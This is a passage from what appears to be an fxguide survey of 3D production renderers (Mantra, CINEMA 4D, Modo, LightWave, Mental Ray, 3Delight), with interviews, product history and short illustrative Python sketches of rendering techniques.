    Mantra as a renderer in its own right can also be optimized for almost any render or situation, such as large crowds, or very large volume renders, “and it has the flexibility to achieve any look on any project,” adds Lowell. “I remember a bit of render engine snobbery from a vfx supervisor saying he would only accept renders from a certain engine and Mantra was the worst you could get (!). We didn’t have time for the lighting department to do look development on the fx so, I simply took the time and textured/lit the elements myself, and mimicked the properties of the other engine. I submitted my final elements as lighting elements. Everyone was on board thinking how well we had lit elements except for the compositing department, who wanted to know why the motion blur was of higher quality.”

    Of course, Houdini could be used for any 3D animation, but it is known for its effects animation more than anything else today. Mantra is included with Houdini. In 2012 fxguide celebrated the 25th anniversary of the company. In that story we wrote:

    According to Nick Van Zutphen, who helped us compile this story, in 1988 a guy in a big wool sweater showed up at the Side Effects office, ‘sheepishly’ looking for a job. That person was Mark Elendt, who at the time was working for an insurance company. The insurance company part didn’t really impress Kim Davidson and Greg Hermanovic, but what they did notice were some photographs Elendt showed taken from an Amiga 1000 screen (with 512kb RAM). It displayed renders of a typical late 80′s ray-traced sphere. “He had written a ray-tracer as a hobby,” says Van Zutphen. “This was the prototype of Mantra, which is Houdini’s native renderer.”

    Mantra is still to this day the Side Effects Houdini packaged renderer. It is very similar in many ways to Pixar’s RenderMan, a renderer that many Houdini customers also use.

    Today Mantra is very much a powerful, solid option for rendering, offering one of the best known in-house renderers from any of the primary 3D vendors. It is very much a tool that could be marketed separately but has always been part of Houdini.


    Mantra looks very much like RenderMan:

    • Mantra’s micropolygon rendering is based on the REYES algorithm. It is a divide and conquer algorithm, a strategy whereby a difficult problem is divided and sub-divided into smaller and smaller problems until it is decomposed into a large number of simple problems. For micropolygon rendering, this takes the form of refinement (see the sketch after this list).

    With raytracing, Mantra does not refine geometry if it knows how to ray trace it natively.

    • The raytracing engine has algorithms to do efficient raytracing of points, circles, spheres, tubes, polygons, and mesh geometry.
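
    As a rough, hypothetical illustration of that refinement step (not Mantra’s actual dicer), the sketch below keeps splitting a parametric patch until its estimated screen-space size falls below roughly a pixel, at which point the pieces would be shaded as micropolygons.

    ```python
    def dice(patch, screen_size, shading_rate=1.0):
        """Recursively split a parametric patch (u0, u1, v0, v1) until each piece
        projects to about one pixel or less, then return it as a 'micropolygon'.
        screen_size(patch) estimates the patch's projected size in pixels."""
        if screen_size(patch) <= shading_rate:
            return [patch]                     # small enough: ready to shade
        u0, u1, v0, v1 = patch
        um, vm = (u0 + u1) / 2.0, (v0 + v1) / 2.0
        micropolys = []
        for child in [(u0, um, v0, vm), (um, u1, v0, vm),
                      (u0, um, vm, v1), (um, u1, vm, v1)]:
            micropolys.extend(dice(child, screen_size, shading_rate))
        return micropolys

    # Toy usage: pretend the whole patch spans 16 pixels and halves with each split.
    size_in_pixels = lambda p: 16.0 * (p[1] - p[0])
    grid = dice((0.0, 1.0, 0.0, 1.0), size_in_pixels)
    print(len(grid))   # number of micropolygons produced
    ```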

    “These days it has shifted very much towards the ray tracing approach, we don’t have too many people using micropolygons anymore, unless they are rendering something that can not fit in memory, but the amount of memory on processors these days is quite high, you fit a lot of geometry in memory and use the ray tracer for pretty much anything,” explains Side Effects’ Andrew Clinton, 3D graphics programmer. “There are a lot of techniques handled more efficiently with ray tracing than with micropolygons, like instancing, you can keep a single copy of an object in memory and just trace rays with different transforms whereas with micropolygons you would need to create new shading grids for that object for each instance, which is a lot slower. The other advantage is that if you have polygons smaller than a pixel, you spend a lot of time breaking up objects that are already smaller than a pixel. In ray tracing you just keep the geometry as is and you don’t need to create any additional geometry or data structures so it is efficient memory wise.”
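
    Clinton’s point about instancing can be shown with a small, hypothetical sketch (not Mantra’s code): the geometry is stored once, and each instance simply transforms incoming rays into the shared object’s local space before intersecting it.

    ```python
    class Sphere:
        """The single copy of the geometry kept in memory."""
        def __init__(self, radius):
            self.radius = radius
        def intersect(self, o, d):
            # Ray/sphere test against a sphere at the origin; True on a hit.
            b = sum(oi * di for oi, di in zip(o, d))
            c = sum(oi * oi for oi in o) - self.radius ** 2
            return b * b - c >= 0.0 and (-b + (b * b - c) ** 0.5) > 0.0

    class Instance:
        """One placement of the shared object: rays are moved into the object's
        local space instead of duplicating the geometry."""
        def __init__(self, shared_object, offset):
            self.obj = shared_object
            self.offset = offset          # a simple translation for this instance
        def intersect(self, ray_origin, ray_dir):
            local_origin = tuple(o - t for o, t in zip(ray_origin, self.offset))
            return self.obj.intersect(local_origin, ray_dir)

    ball = Sphere(1.0)                                        # stored once
    scene = [Instance(ball, (x * 3.0, 0.0, 5.0)) for x in range(1000)]
    hits = sum(inst.intersect((0, 0, 0), (0, 0, 1)) for inst in scene)
    print(hits)   # only the instance in front of the ray is hit
    ```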

    Mantra has at the kernel of the renderer both the micropolygon renderer and a ray tracing engine, but “there are different renderers built on top of that, we have a pure ray tracer but we also have a physically based rendering system that is built on top of that and it is built using the VEX shading language,” points out Side Effects senior mathematician Mark Elendt.

    The core ray tracer could have a biased or unbiased renderer written on top of it thanks to the flexibility of VEX. “Our physically based renderer is pretty much completely unbiased and it is written in that shading language,” adds Clinton.

    In the physically based renderer the team use MIS for the direct lighting and the BRDFs in the scene. Side Effects has experienced a lot of interest, but they actually built it some time ago, before there was as much demand. It was “a bit like: if we build it – they will come,” says Elendt, referring to their 2008 initial implementation. Today there is much more interest in physically plausible pipelines, something that has validated a lot of the early work Side Effects did in this area.
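
    For readers unfamiliar with MIS, here is a minimal one-dimensional Python sketch of the balance heuristic, combining two sampling strategies in the same way a renderer combines light sampling and BRDF sampling for direct lighting. It is a generic illustration under toy assumptions, not Side Effects’ implementation.

    ```python
    import random

    def g(x):             # the 'direct lighting' integrand we want to estimate
        return x * x      # exact integral over [0, 1] is 1/3

    # Two sampling strategies, standing in for a light sampler and a BRDF sampler:
    def sample_uniform():  return 1.0 - random.random()            # pdf p1(x) = 1
    def pdf_uniform(x):    return 1.0
    def sample_linear():   return (1.0 - random.random()) ** 0.5   # pdf p2(x) = 2x
    def pdf_linear(x):     return 2.0 * x

    def mis_estimate(n1=512, n2=512):
        total = 0.0
        for _ in range(n1):
            x = sample_uniform()
            w = n1 * pdf_uniform(x) / (n1 * pdf_uniform(x) + n2 * pdf_linear(x))
            total += w * g(x) / pdf_uniform(x) / n1    # balance heuristic weight
        for _ in range(n2):
            x = sample_linear()
            w = n2 * pdf_linear(x) / (n1 * pdf_uniform(x) + n2 * pdf_linear(x))
            total += w * g(x) / pdf_linear(x) / n2
        return total

    print(mis_estimate())   # hovers around 1/3
    ```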

    Mantra and Houdini are known for their volumetric work, having won technical Oscars in this general area of research (micro-voxels). Side Effects was one of the first companies to work with DreamWorks on OpenVDB, partnering with them to help make it open source. OpenVDB allows volumes to cope with very sparse spaces, which really expands Houdini’s Mantra to efficiently render huge sparse volumes without huge memory hits. Side Effects really supports open source, also very actively supporting Alembic for example. “One thing we did in 12.5 with Alembic and our own geometry is that we implemented a really efficient polygonal mesh that uses pretty much the minimum amount of memory possible, and this really helped with our big fluid sims such as oceans,” explains Clinton.
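
    The memory argument for sparse volumes is easy to see in a toy blocked grid like the one below: only the tiles that actually contain values are allocated, and everything else falls back to a background value. This is a simplified, hypothetical stand-in – OpenVDB’s real structure is a shallow tree with far more machinery – but the principle is the same.

    ```python
    class SparseVolume:
        """Toy blocked/sparse voxel grid: only 8x8x8 tiles that hold data are
        allocated; all other coordinates return the background value."""
        TILE = 8

        def __init__(self, background=0.0):
            self.background = background
            self.tiles = {}                      # (tx, ty, tz) -> flat value list

        def _key(self, x, y, z):
            t = self.TILE
            return (x // t, y // t, z // t), (x % t) + t * ((y % t) + t * (z % t))

        def set(self, x, y, z, value):
            key, idx = self._key(x, y, z)
            tile = self.tiles.setdefault(key, [self.background] * self.TILE ** 3)
            tile[idx] = value

        def get(self, x, y, z):
            key, idx = self._key(x, y, z)
            tile = self.tiles.get(key)
            return self.background if tile is None else tile[idx]

    vol = SparseVolume()
    vol.set(1000, 2000, 3000, 0.75)   # a lone puff of smoke in a huge empty domain
    print(vol.get(1000, 2000, 3000), vol.get(0, 0, 0), len(vol.tiles))
    ```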

    They have also done serious work in volumetric lighting, providing say fire as a lighting source, which was a generalization of their area lights to handle volumes as well as surfaces. “If you have parts, like the center of the fire, that are really bright then it was really good from a perspective of sampling to be able to focus your ray tracing on those parts of the volume, to be able to direct your samples there – it results in really low noise in the render.”

    The next release will not only have improved Alembic support, but also new lighting tools for Houdini and Mantra interaction. But as the next release is not until later in the year, Side Effects may release support for OpenEXR 2.0 deep compositing before then. Mantra has had its own format for deep data for some time, but this would be output in the new OpenEXR 2.0 deep data standard. “The advantage of OpenEXR 2.0 is that you can bring it into Nuke and do compositing there,” says Clinton.


    src="http://player.vimeo.com/video/70560283?title=0&byline=0&portrait=0&color=f24f46" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Above: Watch the Houdini demo reel 2013.


    Mantra supports SSS using a point cloud approach with an irradiance cache; it is based on a Jensen dipole model. There is a ray tracing and path tracing approach in the lab, but mainly to have a ground truth to compare the point cloud against. Research is continuing but there are no immediate plans to change the system or approach.

    Mantra continues to improve its speed, and this is especially true of the ray tracer. Clinton joked that some of the work is new algorithms and some is simply fixing things that were broken. In one isolated case a simple fix on opacity made a huge difference to fur rendering – literally one tweak yielded a render several orders of magnitude faster on complex fur for one client. It is not normally that simple, but “we just played with a constant and got huge improvements!” joked the team, quick to point out that was an unusual “edge case”. Like many other companies Side Effects is working hard on moving things from being single threaded to multi-threaded. Here a really wide benefit can be felt by customers, especially those on newer 8 and 12 core machines.

    Of course, many Side Effects customers use other third party renderers, and Houdini supports RIB output for PRMan, 3Delight, etc and there are plugins for others like V-Ray.


    2.6 CINEMA 4D – Maxon

    Oliver Meiseberg, product manager, Maxon Computer GmbH told fxguide: “CINEMA 4D supports other renderers very well, we cover almost any renderer out there in our software. It is up to the user to choose whichever renderer they feel comfortable with and is the best for the project.”


    While most renderers are available, Meiseberg estimates the most popular is easily V-Ray, “but a bunch also use Mental Ray and the large houses use RenderMan.” A new version of CINEMA 4D is expected to be at SIGGRAPH 2013. According to some sources, a third party bridge to Arnold and support for Krakatoa may be previewed at SIGGRAPH. Thinkbox Software’s Krakatoa is a production-proven volumetric particle rendering and manipulation toolkit. A V-Ray update may also be coming. The key area to watch out for with V-Ray is support of light mapping.

    Light mapping (also called light caching) is a technique for approximating GI in a scene. This method was developed by Chaos Group and will be in R15, to be announced on July 23rd. It is very similar to photon mapping, but without many of its limitations. The light cache or map is built by tracing many eye paths from the camera. Each of the bounces in the path stores the illumination from the rest of the path into a 3D structure, very similar to the photon map. But in a sense it is the exact opposite of the photon map, which traces paths from the lights and stores the accumulated energy from the beginning of the path into the photon map.
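
    A toy sketch of that light caching idea (purely illustrative, not Chaos Group’s implementation): trace eye paths, and at each bounce store the illumination gathered by the remainder of the path in a spatial hash keyed on position, so that later shading points nearby can reuse the cached value instead of tracing further bounces.

    ```python
    import random
    from collections import defaultdict

    class LightCache:
        """Toy light cache: the illumination seen by the tail of each eye path is
        stored at a coarsely quantized hit position for later reuse."""
        def __init__(self, cell_size=0.5):
            self.cell = cell_size
            self.total = defaultdict(float)
            self.count = defaultdict(int)

        def _key(self, p):
            return tuple(int(c // self.cell) for c in p)

        def store(self, position, radiance):
            k = self._key(position)
            self.total[k] += radiance
            self.count[k] += 1

        def lookup(self, position):
            k = self._key(position)
            return self.total[k] / self.count[k] if self.count[k] else 0.0

    def trace_eye_path(cache, bounces=3):
        """Walk one eye path; each bounce records what the rest of the path saw."""
        position = (random.random(), random.random(), 0.0)
        for _ in range(bounces):
            radiance_from_rest_of_path = random.random()   # stand-in for tracing on
            cache.store(position, radiance_from_rest_of_path)
            position = tuple(c + random.uniform(-0.2, 0.2) for c in position)

    cache = LightCache()
    for _ in range(10000):
        trace_eye_path(cache)
    print(cache.lookup((0.5, 0.5, 0.0)))   # averaged illumination stored near that point
    ```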

    CINEMA 4D offers two render options. Since version 13 there has been a second, physical renderer; the light mapping is in the physical renderer for example. “Most people love the physical renderer – the feedback has been awesome, but with tight deadlines most people go back to the advanced renderer; but if you want physically accurate use the new renderer.”


    The SSS shader was completely rewritten from scratch for version 13, and thus is fairly new. The standard it set in SSS, with its varying per-wavelength adjustments, has proven popular with customers. Like many users, C4D users want to move to a simpler lighting model, with no loss in quality but with an easier, more natural lighting setup phase that behaves more like one might expect and involves fewer hacks and tricks.

    The product is the leading application for motion graphics but it is more and more used in visual effects, and while it is not a primary focus for the company, they are happy with the growth the product has experienced in both the entertainment space and the product visualisation community. Maxon has customers in the automotive industry and many other major product design companies. The main goal remains the motion graphics industry. “It is great to see the product entering other markets – even if we don’t target them,” says Meiseberg.


    Tim Clapham, Luxx, Discovery Kids ident.

    One of the biggest coups of the last 6 months is the link between Maxon C4D and Adobe’s After Effects. While not a rendering issue directly, it has helped to bring the product to an even wider audience and given the brand vast extra international exposure. You can link from AE to the CINEMA 4D render engine; that engine is based on the R14 advanced renderer, not the new physical renderer, but this is coming, says Meiseberg. There is also a live or dynamic link from Premiere to AE which allows teams to work more effectively in a production concurrently. This places C4D renders back into AE and then automatically into Premiere.

    “Cinema 4D entered a new era with the introduction of the physical renderer,” says C4D user and fxphd Prof. Tim Clapham. “Allowing us to use real world camera attributes such as aperture and shutter speed in conjunction with true 3D motion blur and depth of field. This combined with a central location to control global samples for blurry effects, area shadows, sub-surface scattering and occlusion shaders results in enhanced workflow with more realistic renders.”

    Maxon will be at SIGGRAPH 2013.


    2.7 Modo – The Foundry

    Modo from Luxology, now at The Foundry, is expanding on several fronts. Firstly, as a part of The Foundry it is more exposed to the high end effects market, but also key supervisors such as John Knoll, senior visual effects supervisor and now chief creative officer at ILM, have independently been forthcoming in saying how much they like the clean and fresh user experience of Modo and its renderer. For example, inside Modo there is a spherical projection type for the camera item that allows the creation of spherical environment maps, including export of Modo-created panoramic HDRIs. John Knoll rendered 360 spherical Pacific Rim set images out to his iPad for the film, and then he could interactively look around the real set, seeing in real time where the giant Pac Rim machines and bases, cranes etc would be, thanks to an app that detects tilt and shift and displays the window onto the Modo rendered ‘set’ interactively. This allowed actors to know where to look and anyone to judge what the framing should allow for – in effect it was a virtual set – on set – via Modo and an iPad.


    Lois Barros – Arch Pre Viz artist now moving to feature films in Portugal.

    John Knoll (an Oscar winner whose films include but are not limited to Pacific Rim, Mission Impossible: Ghost Protocol, Avatar, Pirates of the Caribbean I, II, III, and Star Wars I, II, III, etc) has used Modo since version 201. ILM uses a variety of renderers and Knoll is no different, but he seems to genuinely like the Modo tools and renderer for certain projects or tasks.

    Modo is a hybrid renderer; if one keeps an eye on settings it can be run in a physically plausible, unbiased way. “In that sense I think it is more like V-Ray, when Allen (Hastings) was writing it (in 2002) he was looking at how we can make it have the scalability that something like RenderMan is known for, but also take advantage of some of the new technologies that were coming out around then,” says co-founder Brad Peebler. Through the use of both biased and unbiased approaches Modo’s renderer includes features like caustics, dispersion, stereoscopic rendering, fresnel effects, subsurface scattering, blurry refractions (e.g. frosted glass), volumetric lighting (smokey bar effect), and Pixar-patented deep shadows.

    The renderer is not as mature as some – for example its EIS (Environment Importance Sampling) does not yet provide IS on directional lights nor full MIS covering materials – but the EIS does work well for both Monte Carlo and irradiance caching approaches and produces greater realism from HDR light probe captures. Furthermore the team plan to expand IS throughout the product.
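
    The general idea behind environment importance sampling is straightforward to sketch: build a cumulative distribution over the texels of the HDR probe, weighted by luminance, so that bright regions (a sun, a window) receive most of the light samples. The Python below is a hypothetical toy version of that scheme – not Luxology’s implementation – and it ignores the solid-angle weighting a real lat-long map would need.

    ```python
    import random, bisect

    def build_env_cdf(env_map):
        """env_map: 2-D list of luminance values from an HDR light probe.
        Returns a flat cumulative table over all texels."""
        cdf, total = [], 0.0
        for row in env_map:
            for lum in row:
                total += lum
                cdf.append(total)
        return cdf, total

    def sample_env(env_map, cdf, total):
        """Pick a texel with probability proportional to its luminance and
        return (row, col, pdf) so the estimator can stay unbiased."""
        i = bisect.bisect_left(cdf, random.random() * total)
        width = len(env_map[0])
        row, col = divmod(i, width)
        return row, col, env_map[row][col] / total

    # A tiny fake probe: mostly dim sky with one very bright 'sun' texel.
    env = [[0.05] * 8 for _ in range(4)]
    env[1][3] = 50.0
    cdf, total = build_env_cdf(env)
    hits = sum(1 for _ in range(1000) if sample_env(env, cdf, total)[:2] == (1, 3))
    print(hits / 1000.0)    # most samples land on the sun
    ```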

    Peebler points out that every renderer makes pretty pictures and can render photorealistic images, but the key now is getting there faster. “There are two ways you can do that, one is making your rendering engine faster and the other is making it so users don’t have to fiddle with so many values and tweak so many settings.”


    Visual effects by Light VFX from The Butterfly’s Dream.

    Some renderers, he states, take the approach that everything is physically based and “you have to just render with the real world settings regardless, and others tilt the other direction, more human time to set it up but it renders it faster, inside Modo. EIS is one of those things that does both – and there aren’t too many of those (!) – it is something Allen has wanted to do for a long time. Allen was actually inspired into the implementation after a conversation we had with Kim Libreri (senior VFX supervisor), John Knoll (ILM chief creative officer) and Hilmar Koch (head of computer graphics at ILM) about importance sampling.”

    EIS is an example of the entertainment industry side providing a new tool that has been appreciated by Modo’s architectural clients, and that has been a two way street: in reverse, the design and architectural clients requested embedded Python, which has been a big boost to many effects and animation customers.

    Luxology is one of those companies focused on a variety of markets, pointing out that some of their design clients are doing vfx work, while vfx companies like Pixomondo are doing design work to even out production cycles. Peebler believes they can cover multiple markets with the same core product, without the need to bifurcate to address them individually. And it is not even something The Foundry is seeing just with Modo – Apple Inc. owns Nuke licenses, points out Peebler. For Luxology’s R&D team it is key that their render technology cover a range of needs, both photoreal rendering and more stylized solutions, in a range of markets and countries around the world. “I was at a client – a design client who had a real time visualisation – they have a set of screens making up a 15m x 10m LED wall – powered by a 500 cluster render farm – for real time interaction for their car design reviews, it was phenomenal, and from a budget point of view, the design space is vastly larger than the entertainment space,” notes Peebler.


    CG work by Creative Conspiracy.

    The Modo renderer is provided as both a final render engine and as an optimized preview renderer that updates as you model, paint or change any item property within Modo.

    The Modo renderer uses high dynamic range radiance units throughout its calculations for accuracy and quality. The renderer is highly scalable on multi-core systems, delivering nearly linear speedups as more processors/cores are added. The renderer’s performance is a combination of tight code and a “unique front-end that decouples many key computations, allowing for a finely tuned balance between memory requirements, speed, and final image quality,” explains Peebler. “A client sent me an image that was about 6 trillion polygons that rendered in about 10 minutes, now those are of course a combination of multi-resolution sculpted micro-polys and a ton of instancing but the renderer is not the bottleneck.” Modo 701 now scales better than 601 and “Modo continues to expand in this area of scalability.”

    One very exciting trend is the possibility of Modo and Nuke working more closely together. Nuke deploys only a scanline renderer as standard. Modo’s renderer does not currently support deep compositing, but, says Peebler, “as a company that has the industry’s leading comp system supporting deep compositing, you can imagine we would be ‘interested’ in getting the Modo renderer to support that as well.”

    Another interesting connection is Modo to Mari. Mari is very much a product that is known for its strong Ptex implementation, but Modo is known perhaps much more strongly for its UV work on Avatar and other films since. “We see a lot of benefit in previewing textures with full global illumination. Mari is brilliant at what it does, and you can get good lookdev right there in Mari, but if you want more like sub surface Modo’s renderer is excellent,” suggests Peebler.

    Actually, an artist at ILM, Jacobo Barreiro, on his own produced a video called Moma as a proof of concept of Mari and Modo working together. Barreiro internally won ILM’s award for best environment on Star Trek: Into Darkness (future San Fran) and is thus a very serious artist, not just a student or fanboy. Peebler seems very aware of the interest in connecting Modo to the other products and especially rendering through the comp. While The Foundry is render agnostic – the Luxology team and the Nuke developers are perfectly placed to expand complex integration between Modo and Nuke in ways as yet unseen.

    Modo supports toolkits which can extend the capability of the renderer. These include the NPR (non-photo-real) module – popular in Japan. The lead programmer on NPR is actively developing more in this area, and the Studio Lighting Kit – which was one of the most popular extensions especially with photo retouchers who were early Modo adopters.

    Below is the work of artist Rodrigo Gelmi, one of several of his tests suggested by Modo’s Peebler:
    src="http://www.youtube.com/embed/TMGdy_mWDmo" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Modo is more than just a renderer, and Luxology’s workflow fully supports exporting to third party renderers, allowing Modo’s fast preview renderer to aid in modeling. As Peebler says, “we are not in the selling render license business.” They see “our rendering technology as a great enabler for people, we are not trying to disrupt anyone’s pipeline. We are not trying to displace anyone else’s renderer.” For example Maxwell works well with Modo, and they are keen to see V-Ray working more with Modo. Currently Peebler estimates only 5% of clients render to a third party renderer and most are either Maxwell or V-Ray.

    Not to short change the Modo renderer for high end work: it is also possible to use only Modo’s renderer on a big production, as proven by the new Luc Besson fully animated feature film being made at Walking the Dog Studios in Brussels – which is being rendered entirely in Modo.

    Exclusive Nuke-Modo Tech Experiment:

    What makes Modo’s renderer incredibly interesting is its sister applications at The Foundry. Connecting Modo to Mari and Katana makes obvious 3D sense, but the team is exploring much more than that. The Foundry is doing incredible work in exploring Modo, or more specifically Modo’s renderer, with Nuke. This complex series of possible connections and interfaces could cause Modo’s renderer to be elevated faster and more significantly than anything in recent times. Nuke is the dominant compositor in high end film and effects. Below is a video showing a test running in R&D. In the video Modo is automatically updating 3D renders in a Nuke setup. Of course it is possible to render a number of passes that would allow Nuke to manipulate a render that has been imported, but this is a live connection between the two applications. This was recorded on a laptop running a 2.8GHz i7.

    Peebler commented, “This is a ‘technical sketch’ showing what we think workflows might look like in the future. This is not indicative of an intended shipping product. We like to ‘doodle’ a bit with our vast body of combined technologies and we hope that this will spark a conversation with users to help guide us on what users would like to see, and what might be possible.”


    A look at a live link between Modo and Nuke

    If you are at SIGGRAPH 2013, we recommend you find a senior Foundry/Luxology staff member, offer your thoughts, and bug them to see more. Watch above or download an HD version: TF_Labs.mp4


    2.8 Lightwave – Newtek

    Lightwave is very strong in a few markets including the television episodic effects market where sci-fi scripts have called for more and more visual effects.


    Eugenio Garcia Villareal

    Historically, the company has strong user groups in markets outside our scope, but they do influence its approach to rendering. The company has roots in scanline rendering but since 2006 it has had a fully ray traced solution. Newtek’s Rob Powers (President, NewTek LightWave Group) feels that many smaller companies are keen to use new tools such as are discussed above but have found it difficult: “I feel today with the struggles some studios are having to possibly use or adopt the same workflows that are possibly highlighted at the very sexy ILM and Weta Digital project level, what I have seen is that a lot of studios are struggling trying to replicate that. We know that a company of 40 or more staff members is the norm.” And Powers feels LightWave is well positioned to help people and companies in that position.

    While the renderer today supports ray tracing it also supports some of the other features and more traditional approaches. The software has both a nodal based and layered based shader system. “It is kind of like a Lego block system for people who don’t know how to write shaders, and it ships with a bunch of predefined shaders like the skin shader or car paint shader,” says Powers.

    On the whole the ray tracer is a biased approach – a general radiosity solution designed for production, supporting a wide variety of approaches. It is designed to be quick which is more important than ‘correct’ according to NewTek. You can do a brute force approach but it is not normally used that way. It is a tool aimed to be quick and fast and not optically accurate to the extent of other high end renderers.


    Naoya Kurisu

    LW has an interactive window in the viewport (VPR). The first VPR was scanline, the next version was a ray tracer (LW 8.6/9), and now there is a new version which is very fast and really a whole third approach. It is backward compatible, but the new VPR is really quite impressive. It no longer renders just polygons but can render lines and other primitives. It also has a new instancing system that is extremely fast.

    “This is really the direction we are moving in not just features but meta-features,” explains Mark Granger, rendering lead at LightWave 3D Group. “For example, when we added the edge rendering we did not just add it as a simple feature we added it with the nodal shaders so that the nodes can control the thickness and color, even full shading of the edges and we think this will be really popular with the Anime community who can make it look like it was done with different brushes just by changing the shaders.” As the lines primitives can have shaders they can have texture maps, gradients and many other types of power from the LW nodal shader system.

    It does not currently have MIS or importance sampling generally, but it is something that the team is considering, and on their planning horizon. The lack of MIS makes running the LW renderer as a full brute force ray tracer an unlikely option in a production environment, especially given the fast-paced production environments that LW clients live in. It is wonderful to do high end rendering, but if you have to get an episode out, have 3 more in the pipe and another 2 being shot – then speed and deliverable results are the key. But episodic television also needs to provide production values often on par with films that have months if not years longer in post, and certainly much bigger budgets.


    Still from Defiance.

    LW has managed to provide not only fast and professional results, but thanks to aggressive pricing productions can also compete financially, leading more than one client to stop productions moving out of state by letting the work be competitive in, say, California/Hollywood. Productions such as Defiance and visual effects supervisors such as Gary Hutzel (located on the Universal Studios lot in Los Angeles) have had great success with LW. His work on Blood & Chrome was also covered on fxguide.

    LW has three types of motion blur, dithered, vector and fully ray traced sampled motion blur. Its hair and fibre shaders have now been used widely on shows such as Terra Nova, CSI and Grimm.

    LightWave users can use not only the product’s own renderer but also third party renderers such as Kray Tracing. There is also an Octane implementation from Otoy for LW users. Most users do use the LW renderer and the free render farm LW licenses which come with it.


    DJ Waterman

    NewTek is closely monitoring GPU rendering; their VPR is a fast multi-threaded solution. Mark Granger has worked very closely with Nvidia and the original CUDA beta – but he feels that perhaps the price of going down the GPU path may not be worth it. “The cost of supporting GPU rendering in terms of what we would have to give up in terms of flexibility is so extreme – I don’t think it is worth it to us. For a third party plugin it might be interesting – but for the main renderer – in a general purpose package like LightWave 3D, we really don’t want to give up all the flexibility – like for example giving up being able to work with third party plugin shaders and all the other things that require say large amounts of memory.”

    He also pointed out the rapidly changing nature of GPUs makes it hard to commit, given the ground is moving so fast in this area, and GPU work tends to be very specific. It is not an area they are ignoring, but they feel CPU is their best place to focus.

    LW does not support Ptex as we reported previously, nor does it currently support Alembic, but support for the latter might be coming very soon. SIGGRAPH is within a fortnight and one might expect 11.6 to be at SIGGRAPH, but the exact roll out is not yet published or known.


    2.9 Mental Ray – Nvidia

    Mental Ray is a ray tracer with MIS, but as its shaders allow so much C++, it is hard to say whether it is unbiased or biased, since you can use Mental Ray as just a thing that shoots rays while everything else is done by the shaders. But being efficient is hard – that is the cost of Mental Ray’s massive flexibility. There is so much legacy code around the code base. It may be that Mental Ray never transitions to a new hybrid efficient renderer. Today, one can run Mental Ray with BRDFs, but only the ones provided by the Mental Ray advanced rendering team. Depending on your point of view, Mental Ray is a great platform for its flexibility or too code focused for a modern pipeline. The problem is really not whether it can render something, but what it takes to set up that render, and maintain that as a modern physically based energy conserving rendering environment (should you choose to want to do that). Most people who want to set up modern new rendering pipelines for large scale production environments are simply not doing that in Mental Ray.

    At the other end of the massive pipeline production render environment are individuals who know how to use it and are keen to just get shots delivered. Lucas Martell is a director and animator who has made some hugely successful short film projects as well as working professionally for many years. “I’ve worked with Mental Ray for years and it’s served our needs very well. A lot of the complaints about Mental Ray come down to its complexity. I feel like it has gotten much simpler in the past few years, but more importantly, those settings do give you some very granular control over the rendering quality/efficiency. Because we already know those settings inside and out, we’ve never run into something that we couldn’t do in MR.”

    “Granted we are a small shop, so the scale we deal with doesn’t come close to the big animation studios, but the integration with Softimage is so great that we haven’t hit the tipping point where investing in a lot of 3rd party licenses makes sense. Plus we have a lot of custom code written to optimize shaders, set up our passes, etc. Renderers are just tools. The best one is the tool you know inside and out.”


    A frame from the Ocean Maker from Dir. Lucas Martell.

    The image above was rendered by fxphd Prof. and director Lucas Martell. The image was rendered with one key light with final gather. The image took approximately one hour/frame including 3D motion blur (on a laptop).

    Håkan “Zap” Andersson, now at Autodesk and formerly of Nvidia/Mental Images, pointed out that newer versions of Max and Maya at Autodesk have new parts of Mental Ray available to them, such as unified lighting and IBL in, say, 3ds Max. These are not so much new Mental Ray features as features now available to artists that previously were not accessible in Mental Ray from these key Autodesk products.

    As mentioned above, Nvidia is exploring MDL for Iray. Part of that is the Mental Images Layering Library (MILA). This reflects the same thinking as OSL and could become the implementation of a new shader system for Mental Ray. It is hard to see yet whether Nvidia or Autodesk, with some unified solution, will lead a move to OSL or MDL or nothing at all. Not only does Autodesk need to consider its array of programs – Softimage, Max, Maya etc – but also the fact that so many of their clients use products like V-Ray and not the standard Mental Ray, and V-Ray is now supporting OSL and would be unlikely to support a hybrid modified Nvidia shader solution.

    As Mental Ray comes standard with Autodesk products it is not surprising that indie film makers have worked with Mental Ray and in many respects they are producing some of the best work with it. Below is a great example of indie production by Pedro Conti in this breakdown of ‘One More Beer’, rendered in Mental Ray. Watch the full short here.


    Breakdown of ‘One More Beer’.

    Conti says, “I started working on the Viking Project in January of 2011. Over the span of 5 months, I did the illustration but I had plans for an animation. From July to December of 2011, the project was on hold until Alan Camilo (animator) came on to join the project. The animation process took about 2 months of free time, and after the animation process I worked on polishing all details of lighting, shading, compositing, and finalization of the short film. We released ‘One More Beer’ on the 1st of October. So, it was 9 months of hard work – overnights and weekends – to complete it.”


    Lighting setup.

    For the lighting, Conti relied on 10 photometric area lights in Mental Ray with MR exposure control and 1 skylight for the ambient light. “Lots of fakeosity to reach the mood that I was aiming,” he adds. “Final gathering was also used for some extra light bounces. It was rendered in passes. One main beauty pass + additional passes for comp like hair, zdepth, masks, atmospherics. In total it was about 30 passes. For the beauty pass it was about 2 hours/frame, and hair pass about 5 minutes/frame. Additional passes were really fast as it was rendered in Scanline Renderer.”


    2.10 3Delight – DNA Research

    3Delight is a RenderMan compliant renderer, and is used by companies such as Image Engine in Canada. They have been a customer since 2007. They have used it extensively with Cortex (see part 1) and they are one of the renderer’s highest profile customers. Image Engine is always evaluating its rendering options moving forward, but for now it is very happy with the close working relationship it has with DNA Research.


    Zero Dark Thirty – VFX by Image Engine.

    Like many other companies they are looking at more physically based lighting and shaders with ray tracing. “Coming off the last few shows we have been reviewing our pipeline and thinking about how we might generally be more efficient and one of those things is simplifying the lighting workflow,” says Image Engine CG supervisor Ben Toogood.

